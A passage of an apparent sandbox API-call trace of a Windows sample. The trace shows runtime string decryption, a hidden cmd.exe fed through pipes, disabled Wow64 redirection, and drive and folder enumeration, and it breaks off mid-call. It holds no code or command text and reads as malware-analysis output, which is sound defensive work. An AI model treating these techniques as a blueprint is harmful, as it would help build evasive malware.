WriteFile (in: hFile=0x9c, lpBuffer=0x8c1538*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0xfbfa98, lpOverlapped=0x0 | out: lpBuffer=0x8c1538*, lpNumberOfBytesWritten=0xfbfa98*=0xbc, lpOverlapped=0x0) returned 1 [0045.018] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0065.311] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c54a0 [0065.311] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf994, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9fc | out: phKey=0xfbf9fc*=0x2e8500) returned 1 [0065.312] CryptSetKeyParam (hKey=0x2e8500, dwParam=0x1, pbData=0xfbf9e4, dwFlags=0x0) returned 1 [0065.312] CryptDecrypt (in: hKey=0x2e8500, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54a0, pdwDataLen=0xfbf9b0 | out: pbData=0x8c54a0, pdwDataLen=0xfbf9b0) returned 1 [0065.312] CryptDestroyKey (hKey=0x2e8500) returned 1 [0065.312] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.312] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76c4d668 [0065.312] Wow64RevertWow64FsRedirection (OlValue=0xfbfaa4) returned 1 [0065.312] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54a0 | out: hHeap=0x8c0000) returned 1 [0065.312] CloseHandle (hObject=0x108) returned 1 [0065.312] CloseHandle (hObject=0x10c) returned 1 [0065.312] CloseHandle (hObject=0xa0) returned 1 [0065.312] CloseHandle (hObject=0x9c) returned 1 [0065.312] CloseHandle (hObject=0xf0) returned 1 [0065.312] CloseHandle (hObject=0xec) returned 1 [0065.312] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1668 | out: hHeap=0x8c0000) returned 1 [0065.312] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1538 | out: hHeap=0x8c0000) returned 1 Thread: id = 12 os_tid = 0x9b4 [0044.979] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c14d8 [0044.979] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff714, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff77c | out: phKey=0x10ff77c*=0x2e86f0) returned 1 [0044.979] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x10ff764, dwFlags=0x0) returned 1 [0044.979] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d8, pdwDataLen=0x10ff730 | out: pbData=0x8c14d8, pdwDataLen=0x10ff730) returned 1 [0044.979] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x14) returned 0x8c1500 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x14) returned 0x8c16c0 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0044.980] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff6ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff754 | out: phKey=0x10ff754*=0x2e86f0) returned 1 [0044.980] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x10ff73c, dwFlags=0x0) returned 1 [0044.980] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x10ff708 | out: pbData=0x8c5480, pdwDataLen=0x10ff708) returned 1 [0044.980] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.980] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c1500, nSize=0xa | out: lpDst="") returned 0x1c [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c16c0 | out: hHeap=0x8c0000) returned 1 [0044.980] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x26) returned 0x8c1500 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x26) returned 0x8c16c0 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0044.980] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff6e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff750 | out: phKey=0x10ff750*=0x2e86f0) returned 1 [0044.980] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x10ff738, dwFlags=0x0) returned 1 [0044.980] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x10ff704 | out: pbData=0x8c5480, pdwDataLen=0x10ff704) returned 1 [0044.980] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.980] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c1500, nSize=0x13 | out: lpDst="") returned 0x1c [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c16c0 | out: hHeap=0x8c0000) returned 1 [0044.980] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x4a) returned 0x8c16c0 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4a) returned 0x8c5480 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c54d8 [0044.980] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff6e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff750 | out: phKey=0x10ff750*=0x2e86f0) returned 1 [0044.980] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x10ff738, dwFlags=0x0) returned 1 [0044.980] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54d8, pdwDataLen=0x10ff704 | out: pbData=0x8c54d8, pdwDataLen=0x10ff704) returned 1 [0044.980] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54d8 | out: hHeap=0x8c0000) returned 1 [0044.980] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c16c0, nSize=0x25 | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.980] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.980] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c14d8 [0044.980] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff70c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff774 | out: phKey=0x10ff774*=0x2e86f0) returned 1 [0044.981] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x10ff75c, dwFlags=0x0) returned 1 [0044.981] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d8, pdwDataLen=0x10ff728 | out: pbData=0x8c14d8, pdwDataLen=0x10ff728) returned 1 [0044.981] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.981] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0044.981] Wow64DisableWow64FsRedirection (in: OldValue=0x10ff82c | out: OldValue=0x10ff82c*=0x0) returned 1 [0044.981] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.981] CreatePipe (in: hReadPipe=0x10ff838, hWritePipe=0x10ff83c, lpPipeAttributes=0x10ff814, nSize=0x0 | out: hReadPipe=0x10ff838*=0x98, hWritePipe=0x10ff83c*=0xf4) returned 1 [0044.981] CreatePipe (in: hReadPipe=0x10ff834, hWritePipe=0x10ff830, lpPipeAttributes=0x10ff814, nSize=0x0 | out: hReadPipe=0x10ff834*=0xf8, hWritePipe=0x10ff830*=0xfc) returned 1 [0044.981] SetHandleInformation (hObject=0xf4, dwMask=0x1, dwFlags=0x0) returned 1 [0044.981] SetHandleInformation (hObject=0xf8, dwMask=0x1, dwFlags=0x0) returned 1 [0044.981] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x10ff7c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x98, hStdOutput=0xfc, hStdError=0xfc), lpProcessInformation=0x10ff804 | out: lpCommandLine=0x0, lpProcessInformation=0x10ff804*(hProcess=0x104, hThread=0x100, dwProcessId=0x9b8, dwThreadId=0x9bc)) returned 1 [0045.013] WriteFile (in: hFile=0xf4, lpBuffer=0x8c1600*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x10ff820, lpOverlapped=0x0 | out: lpBuffer=0x8c1600*, lpNumberOfBytesWritten=0x10ff820*=0x5b, lpOverlapped=0x0) returned 1 [0045.013] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0065.238] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c5480 [0065.238] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x10ff71c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x10ff784 | out: phKey=0x10ff784*=0x2ebcf0) returned 1 [0065.238] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x10ff76c, dwFlags=0x0) returned 1 [0065.238] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x10ff738 | out: pbData=0x8c5480, pdwDataLen=0x10ff738) returned 1 [0065.238] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.239] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.239] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76c4d668 [0065.239] Wow64RevertWow64FsRedirection (OlValue=0x10ff82c) returned 1 [0065.239] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0065.239] CloseHandle (hObject=0x104) returned 1 [0065.239] CloseHandle (hObject=0x100) returned 1 [0065.239] CloseHandle (hObject=0x98) returned 1 [0065.239] CloseHandle (hObject=0xf4) returned 1 [0065.240] CloseHandle (hObject=0xf8) returned 1 [0065.240] CloseHandle (hObject=0xfc) returned 1 [0065.240] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c16c0 | out: hHeap=0x8c0000) returned 1 [0065.240] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1600 | out: hHeap=0x8c0000) returned 1 Thread: id = 49 os_tid = 0xa80 Thread: id = 50 os_tid = 0xa84 [0065.169] GetLogicalDrives () returned 0x4 [0065.169] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c58f8 [0065.169] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x27dfe40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x27dfea8 | out: phKey=0x27dfea8*=0x2ebcf0) returned 1 [0065.169] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x27dfe90, dwFlags=0x0) returned 1 [0065.169] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c58f8, pdwDataLen=0x27dfe5c | out: pbData=0x8c58f8, pdwDataLen=0x27dfe5c) returned 1 [0065.169] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.169] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c14a0 [0065.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x11c [0065.169] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x120 [0065.169] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c20 [0065.169] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xe) returned 0xd36c08 [0065.169] ResetEvent (hEvent=0x120) returned 1 [0065.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1243b2e, lpParameter=0xd36c20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124 [0065.170] CloseHandle (hObject=0x124) returned 1 [0065.170] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36bf0 [0065.170] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xe) returned 0xd36bd8 [0065.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1243b2e, lpParameter=0xd36bf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124 [0065.171] CloseHandle (hObject=0x124) returned 1 [0065.171] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) Thread: id = 51 os_tid = 0xa88 [0065.171] GetLogicalDrives () returned 0x4 [0065.171] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c5940 [0065.171] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x2a5fab8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a5fb20 | out: phKey=0x2a5fb20*=0x2ebcf0) returned 1 [0065.171] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x2a5fb08, dwFlags=0x0) returned 1 [0065.171] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5940, pdwDataLen=0x2a5fad4 | out: pbData=0x8c5940, pdwDataLen=0x2a5fad4) returned 1 [0065.171] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.171] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c5988 [0065.172] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x124 [0065.172] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x128 [0065.172] GetLogicalDrives () returned 0x4 [0065.172] Sleep (dwMilliseconds=0x3e8) Thread: id = 53 os_tid = 0xaa0 [0065.241] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x38) returned 0x8c16c0 [0065.241] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x18) returned 0x8c1600 [0065.241] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xfc [0065.241] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xf8 [0065.241] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xf4 [0065.241] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd37a48 [0065.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1243957, lpParameter=0x11ff998, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0065.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1243957, lpParameter=0x11ff998, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0065.243] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd47a50 [0065.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 0x2ebcf0 [0065.243] GetLastError () returned 0x0 [0065.243] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x214) returned 0x8cc2d0 [0065.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0065.244] GetCurrentThreadId () returned 0xaa0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd57a58 [0065.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0x2ebd30 [0065.245] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.245] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.245] GetLastError () returned 0x0 [0065.245] SetLastError (dwErrCode=0x0) [0065.245] GetLastError () returned 0x0 [0065.245] SetLastError (dwErrCode=0x0) [0065.245] GetLastError () returned 0x0 [0065.245] SetLastError (dwErrCode=0x0) [0065.245] GetLastError () returned 0x0 [0065.245] SetLastError (dwErrCode=0x0) [0065.245] GetLastError () returned 0x0 [0065.245] SetLastError (dwErrCode=0x0) [0065.245] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.246] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.246] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.246] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.246] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd67a60 [0065.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.246] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.246] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.246] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.246] GetLastError () returned 0x0 [0065.246] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.248] SetLastError (dwErrCode=0x0) [0065.248] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.249] SetLastError (dwErrCode=0x0) [0065.249] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.251] SetLastError (dwErrCode=0x0) [0065.260] GetLastError () returned 0x0 [0065.260] SetLastError (dwErrCode=0x0) [0065.260] GetLastError () returned 0x0 [0065.260] SetLastError (dwErrCode=0x0) [0065.260] GetLastError () returned 0x0 [0065.260] SetLastError (dwErrCode=0x0) [0065.260] GetLastError () returned 0x0 [0065.260] SetLastError (dwErrCode=0x0) [0065.260] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.261] SetLastError (dwErrCode=0x0) [0065.261] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.262] GetLastError () returned 0x0 [0065.262] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.264] SetLastError (dwErrCode=0x0) [0065.264] GetLastError () returned 0x0 [0065.265] SetLastError 